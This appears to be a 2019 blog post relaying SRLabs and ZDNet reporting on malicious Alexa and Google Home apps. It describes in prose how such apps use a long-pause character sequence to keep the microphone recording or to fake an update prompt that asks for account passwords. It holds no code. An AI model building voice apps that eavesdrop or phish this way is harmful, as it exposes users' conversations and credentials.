ALL-INKL.COM - Webhosting Server Hosting Domain Provider

Alexa is a bad girl!

Smart speakers begin to dominate ones’ homes in these days
but is that a good thing or not? What if these speakers and
their built-in assistants begin to eavesdrop on you and steal
your sensitive data like passwords and the like?

And how safe are Amazon Alexa, Google Home and Apple’s Siri?

A research team tested Amazon Alexa and Google Home with fatal results:

The following video shows how Amazon’s Alexa can steal passwords:

This video shows how Google Home performs:

 And how does Apple’s Siri and the HomePod perform?

Well, that’s another story! As Apple does not allow third-Party apps to implement new “skills” or tasks, it seems safe for now and you won’t see your sensitive data being transmitted somewhere where they don’t belong. Of course the voice recording could be analyzed so it’s unwise to tell the psassword in conjunction with a website or the like.

ZDNet has stated the following:

Both Amazon and Google have deployed countermeasures every time, yet newer ways to exploit smart assistants have continued to surface.

The latest ones were disclosed today, after being identified earlier this year by Luise Frerichs and Fabian Bräunlein, two security researchers at Security Research Labs (SRLabs), who shared their findings with ZDNet last week.

Both the phishing and eavesdropping vectors are exploitable via the backend that Amazon and Google provide to developers of Alexa or Google Home custom apps.

These backends provide access to functions that developers can use to customize the commands to which a smart assistant responds, and the way the assistant replies

The way third-party apps should work is that the microphones are active for only a short time after the smart speaker asks the user a question. For example, tellin Alexa to ask the favourite supermarket app to add something to the basket, the app will check the order history for the exact product details, then Alexa will tell what it found and ask to confirm that’s what is wanted. It will then activate the Echo Dot’s microphone for a short time while it waits for the user to say “yes” or “no”. If there’s no reply within a few seconds, the microphone is switched off again.

However, malicious apps can leave the microphone activated, thus recording what it hears, for much longer. It’s achieved by using a special string that creates a lengthy pause after a question or confirmation, the mic remaining on during this time.

The “�. ” string can also be used […] for eavesdropping attacks. However, this time, the character sequence is used after the malicious app has responded to a user’s command.

The character sequence is used to keep the device active and record a user’s conversation, which is recorded in logs, and sent to an attacker’s server for processing.

Using this method, smart speakers can eavesdrop on anything said while the mic is still recording.

Alternatively, the long pause can be used to make an owner think they are no longer interacting with the app. At that point, a phishing attempt can be made.

The idea is to tell the user that an app has failed, insert the “�. ” to induce a long pause, and then prompt the user with the phishing message after a few minutes, tricking the target into believing the phishing message has nothing to do with the previous app with which they just interacted.

For example, in the videos above, a horoscope app triggers an error, but then remains active, and eventually asks the user for their Amazon/Google password while faking an update message from Amazon/Google itself.

This type of attack would not be possible on HomePod because the only way a third-party app can interact with Siri is via Apple’s own APIs. Fortunately, third-party apps have no direct access to iOS functions or Siri.

October 29, 2019 Netspark - 1594 posts - Member since: May 9th, 2011 No Comments »

Rockbottom!Very badBadAverageGoodVery goodAwesome! (1 votes, average: 7.00 out of 7)
FILED UNDER :Computer , Curiosities , Gadgets , Technology , Thoughts , Video
TAGGED WITH : , , , , , ,

Leave a comment